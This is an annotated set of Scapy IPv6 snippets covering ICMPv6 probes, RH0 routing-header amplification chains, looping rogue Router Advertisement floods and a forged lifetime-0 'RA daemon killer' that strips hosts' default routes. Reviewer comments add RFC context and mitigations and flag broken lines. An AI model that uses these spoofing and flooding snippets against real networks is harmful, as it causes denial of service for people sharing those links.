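# IPv6 ICMP
#
# Scapy IPv6 snippets. They are written for an interactive Scapy session:
# IPv6, ICMPv6EchoRequest, sr1, send, sendp, traceroute6, ... are Scapy names
# and are assumed to be in scope already (nothing on the page imports them).
# The listing's gutter numbers have been dropped and each statement is back
# on its own line.

# --- icmp ipv6 request ---
# Build an echo request layer by layer and wait for the first answer.
i = IPv6()
i.dst = "2001:db8:dead::1"
q = ICMPv6EchoRequest()
p = (i/q)
sr1(p)

# --- ipv6 source route packets ---
# Same echo request, with a routing extension header between the IPv6 header
# and the ICMPv6 payload. The packet is only built here, not sent.
# NOTE(review): IPv6ExtHdrRouting with no explicit type presumably builds a
# type 0 routing header (RH0) -- confirm against the Scapy version in use.
# RH0 was deprecated by RFC 5095: a conforming node ignores it or answers with
# an ICMPv6 Parameter Problem, so on current stacks the routing-header
# snippets below mostly show that RH0 is being dropped.
i = IPv6()
i.dst = "2001:db8:dead::1"
h = IPv6ExtHdrRouting()
h.addresses = ["2001:db8:dead::1", "2001:db8:dead::1", "2001:db8:dead::1"]
p = ICMPv6EchoRequest()
pa = (i/h/p)

# --- Routing Header Example ---
# NOTE(review): "2001:20:82:203:fea5:385" has only six groups and no "::",
# so it is not a valid IPv6 address as printed; it is kept as the page gives
# it and has to be corrected against the original material before this runs.
a = sr1(
    IPv6(dst="2001:4f8:4:7:2e0:81ff:fe52:9a6b")
    / IPv6ExtHdrRouting(addresses=["2001:78:1:32::1", "2001:20:82:203:fea5:385"])
    / ICMPv6EchoRequest(data=RandString(7)),
    verbose=0,
)
# Source address of the reply; `a` is None when nothing answered.
a.src

# --- Traceroute ---
# traceroute6 towards `waypoint`, with a routing header naming `target` and an
# echo request as the layer-4 payload.
waypoint = "2001:301:0:8002:203:47ff:fea5:3085"
target = "2001:5f9:4:7:2e0:81ff:fe52:9a6b"
traceroute6(
    waypoint,
    minttl=15,
    maxttl=34,
    l4=IPv6ExtHdrRouting(addresses=[target])/ICMPv6EchoRequest(data=RandString(7)),
)

# --- Current high score (not tested) ---
# Times one echo request whose routing header alternates addr1/addr2 43 times.
# Long RH0 chains of this kind are the amplification case that led RFC 5095
# to deprecate RH0; nodes that follow it do not forward the packet, and
# filtering routing header type 0 at the network border is the usual control.
import time  # the snippet uses time.time() but the page never imports it

addr1 = "2001:4830:ff:12ea::2"
addr2 = "2001:360:1:10::2"
zz = time.time()
a = sr1(
    IPv6(dst=addr2, hlim=255)
    / IPv6ExtHdrRouting(addresses=[addr1, addr2]*43)
    / ICMPv6EchoRequest(data="staythere"),
    verbose=0,
    timeout=80,
)
# Parenthesised print works on both Python 2 and Python 3.
print("%.2f seconds" % (time.time() - zz))

# --- ipv6 RA (version 1) ---
# The page's heading says "NA", but the packet is a Router Advertisement
# (ICMPv6ND_RA) carrying a prefix-information and a source link-layer option.
# loop=1, inter=3 repeats the send every 3 seconds until interrupted.
# Unsolicited RAs from a host port are what RA-Guard (RFC 6105) on access
# switches is meant to drop; RAs from an unexpected link-layer source are
# also a useful detection signal.
sendp(
    Ether()/IPv6()/ICMPv6ND_RA()
    / ICMPv6NDOptPrefixInfo(prefix="2001:db8:cafe:deca::", prefixlen=64)
    / ICMPv6NDOptSrcLLAddr(lladdr="00:b0:de:ad:be:ef"),
    loop=1,
    inter=3,
)

# --- ipv6 RA (version 2) ---
# Same kind of Router Advertisement (type=134) with every field spelled out.
# The Python 2 long suffixes (6L, 0L, ...) of the original are written as
# plain ints, which Scapy treats the same and Python 3 can parse.
# plen=64 matches the payload as built here: 16 (RA) + 8 (source link-layer
# option) + 8 (MTU option) + 32 (prefix information option) bytes.
a = IPv6(nh=58, src='fe80::214:f2ff:fe07:af0', dst='ff02::1', version=6,
         hlim=255, plen=64, fl=0, tc=224)
b = ICMPv6ND_RA(code=0, chlim=64, H=0, M=0, O=0, routerlifetime=1800, P=0,
                retranstimer=0, prf=0, res=0, reachabletime=0, type=134)
c = ICMPv6NDOptSrcLLAddr(type=1, len=1, lladdr='00:14:f2:07:0a:f1')
d = ICMPv6NDOptMTU(res=0, type=5, len=1, mtu=1500)
e = ICMPv6NDOptPrefixInfo(A=1, res2=0, res1=0, L=1, len=4,
                          prefix='2001:db99:dead::', R=0,
                          validlifetime=2592000, prefixlen=64,
                          preferredlifetime=604800, type=3)
send(a/b/c/d/e)

# --- The one line Router Advertisement daemon killer ---
# NOTE(review): `server` is not defined anywhere on the page; it has to hold
# the router's address before this line can run.
# A Router Lifetime of 0 tells receivers to stop using the sender as a default
# router (RFC 4861), so a forged RA of this form removes hosts' default route.
# RA-Guard (RFC 6105) on access ports, and alerting on lifetime-0 RAs that the
# real router did not send, are the usual mitigations.
send(IPv6(src=server)/ICMPv6ND_RA(routerlifetime=0), loop=1, inter=1)

# --- Test1 ---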
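# ICMPv6 Node Information name query (ICMPv6NIQueryName) sent to each address
# in turn. Written for an interactive Scapy session: sr1, send, IPv6, TCP and
# ICMPv6NIQueryName are Scapy names assumed to be in scope already.
someaddr = ["2001:6c8:6:4::7", "2001:500::1035", "2001:1ba0:0:4::1",
            "2001:2f0:104:1:2e0:18ff:fea8:16f5", "2001:e40:100:207::2",
            "2001:7f8:2:1::18", "2001:4f8:0:2::e", "2001:4f8:0:2::d"]

for addr in someaddr:
    # The original call had no timeout, so one silent host stalled the loop
    # until it was interrupted; sr1 returns None when no answer arrives.
    a = sr1(IPv6(dst=addr)/ICMPv6NIQueryName(data=addr), verbose=0, timeout=5)
    if a is None:
        print("%-35s: no answer" % addr)
        continue
    # Parenthesised print works on both Python 2 and Python 3.
    print(a.sprintf("%-35s,src%: %data%"))

# --- Test2 ---
# Same query, addressed to the all-nodes multicast group ff02::1.
someaddr = ["2001:6c8:6:4::7", "2001:500::1035", "2001:1ba0:0:4::1",
            "2001:2f0:104:1:2e0:18ff:fea8:16f5", "2001:e40:100:207::2",
            "2001:7f8:2:1::18", "2001:4f8:0:2::e", "2001:4f8:0:2::d"]

for addr in someaddr:
    # NOTE(review): `addr` is never used in this loop, so the identical
    # ff02::1 query is sent once per list entry; sr1 keeps only the first
    # answer each time. Kept as on the page -- confirm the intent.
    a = sr1(IPv6(dst="ff02::1")/ICMPv6NIQueryName(data="ff02::1"), timeout=5)
    if a is None:
        print("ff02::1: no answer")
        continue
    print(a.sprintf("%data%"))

# --- IPv6 Scapy 3 Way ---
# Creating an IPv6 3 Way Handshake
#
# Step 1.
# Turn off the RST packets from the kernel, because there is no listening
# port on the source port. (Scapy is not using RAW Socket)
#
#   ip6tables -A OUTPUT -p tcp --tcp-flags RST RST -d {dest IP} -j DROP
#
# The page gives this rule with `iptables`, which only filters IPv4; the RST
# answering an IPv6 SYN-ACK is an IPv6 packet and is filtered by ip6tables.
# While the rule is in place the host sends no TCP RST at all to {dest IP},
# so delete it again afterwards (same rule with -D instead of -A).
#
# Step 2.
# Send the SYN packet with Scapy and fetch the answer.
ip = IPv6(dst="2001:db8:0:1:207:3fff:fe68:df44")
TCP_SYN = TCP(sport=1500, dport=80, flags="S", seq=100)
TCP_SYNACK = sr1(ip/TCP_SYN, timeout=5)

# Step 3.
# Send the ACK packet with Scapy.
# The original dereferenced the answer unconditionally; it can be None (no
# reply) or a RST (port closed), and neither carries a usable sequence number.
if TCP_SYNACK is None or not TCP_SYNACK.haslayer(TCP):
    print("no TCP answer to the SYN")
elif (int(TCP_SYNACK[TCP].flags) & 0x12) != 0x12:
    # 0x12 = SYN (0x02) + ACK (0x10)
    print("answer is not a SYN-ACK: %s" % TCP_SYNACK.sprintf("%TCP.flags%"))
else:
    # Acknowledge the peer's SYN; sequence numbers are 32 bit and wrap.
    my_ack = (TCP_SYNACK[TCP].seq + 1) & 0xffffffff
    TCP_ACK = TCP(sport=1500, dport=80, flags="A", seq=101, ack=my_ack)
    send(ip/TCP_ACK)

# Step 4.
# Check the client with netstat -na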